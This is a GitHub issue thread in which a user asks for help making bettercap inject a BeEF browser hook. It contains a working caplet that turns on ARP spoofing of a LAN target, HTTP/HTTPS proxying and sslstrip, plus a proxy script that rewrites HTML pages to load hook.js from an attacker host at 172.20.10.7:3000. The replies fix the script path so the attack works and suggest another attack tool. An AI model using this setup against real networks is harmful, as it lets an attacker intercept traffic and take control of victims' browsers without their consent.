### ISSUE TITLE
Bettercap can't inject javascript with beef 

### ISSUE THREAD

**Issue by BuggyCheater** [bettercap/bettercap#594]
### Environment

Please provide:

bettercap v2.24.1 (built for linux amd64 with go1.11.6)
Os Kali linux version 2019.2
Command : bettercap -caplet beef-active.cap -eval "set arp.spoof.targets 192.168.1.7; arp.spoof on" -debug

bettercap v2.24.1 (built for linux amd64 with go1.11.6) [type 'help' for a list of commands]

[14:04:12] [sys.log] [dbg] FindGateway(eth0) [cmd=ip opts=[route] parser=^(default|[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+)\svia\s([0-9]+\.[0-9]+\.[0-9]+\.[0-9]+)\sdev\s(\S+).*$]
[14:04:12] [sys.log] [dbg] FindGateway(eth0) output:
default via 192.168.1.1 dev eth0 proto dhcp metric 100 
192.168.1.0/24 dev eth0 proto kernel scope link src 192.168.1.2 metric 100
[14:04:12] [sys.log] [inf] arp.spoof enabling forwarding
[14:04:12] [session.started] {session.started 2019-07-19 14:04:12.239939059 +0300 EEST m=+0.064286466 <nil>}
[14:04:12] [sys.log] [inf] arp.spoof starting net.recon as a requirement for arp.spoof
[14:04:12] [mod.started] net.recon
[14:04:12] [mod.started] arp.spoof
[14:04:12] [sys.log] [inf] arp.spoof arp spoofer started, probing 1 targets.
[14:04:12] [sys.log] [inf] arp.spoof starting net.recon as a requirement for arp.spoof
[14:04:12] [mod.started] net.recon
[14:04:12] [mod.started] arp.spoof
[14:04:12] [sys.log] [inf] arp.spoof arp spoofer started, probing 1 targets.
192.168.1.0/24 > 192.168.1.2  » [14:04:12] [sys.log] [dbg] loading proxy script usr/share/bettercap/caplets/beef-inject.js ...
192.168.1.0/24 > 192.168.1.2  » [14:04:12] [sys.log] [err] error while running caplet beef-active.cap: open caplets/beef-inject.js: no such file or directory

beef-active.cap
# inject beef hook
set http.proxy.script usr/share/bettercap/caplets/beef-inject.js
set https.proxy.script usr/share/bettercap/caplets/beef-inject.js

set http.proxy.sslstrip true
set https.proxy.sslstrip true

# redirect http traffic to a proxy
http.proxy on
https.proxy on

# wait for everything to start properly
sleep 1
# make sure probing is off as it conflicts with arp spoofing
arp.spoof on

beef-inject.js

function onLoad() {
    log( "BeefInject loaded." );
    log("targets: " + env['arp.spoof.targets']);
}

function onResponse(req, res) {
    if( res.ContentType.indexOf('text/html') == 0 ){
        var body = res.ReadBody();
        if( body.indexOf('</head>') != -1 ) {
            res.Body = body.replace( 
                '</head>', 
                '<script type="text/javascript" src="http://172.20.10.7:3000/hook.js"></script></head>' 
            ); 
        }
    }
}
Steps : 
1)Start beef 
2)use the command

everything else works perfectly but when i try to use the beef.cap with the command
bettercap -caplet beef-active.cap -eval "set arp.spoof.targets 192.168.1.7; arp.spoof on" -debug
or
bettercap -caplet beef-active.cap -eval "set arp.spoof.targets 192.168.1.7; arp.spoof on" 
i get the error : 
active.cap: open caplets/beef-inject.js: no such file or directory
I've tried changing the path to usr/share/bettercap/caplets/beef-inject.js
I've tried to copy the bettercap to usr/local/share and changed the path to
usr/local/share/bettercap/caplets/beef-inject.js same problem. Everything works perfect except beef
can you help me please? (This software is the most amazing thing i ever saw!)

**Comment by mibs510** [comment]
You got these wrong:
set http.proxy.script usr/share/bettercap/caplets/beef-inject.js
set https.proxy.script usr/share/bettercap/caplets/beef-inject.js

Set them to:
set http.proxy.script /usr/share/bettercap/caplets/beef-inject.js
set https.proxy.script /usr/share/bettercap/caplets/beef-inject.js

**Comment by azamet90** [comment]
same on me i tryed everything for injecting js but its not working so i tryed xerosploit after and bam it works ...
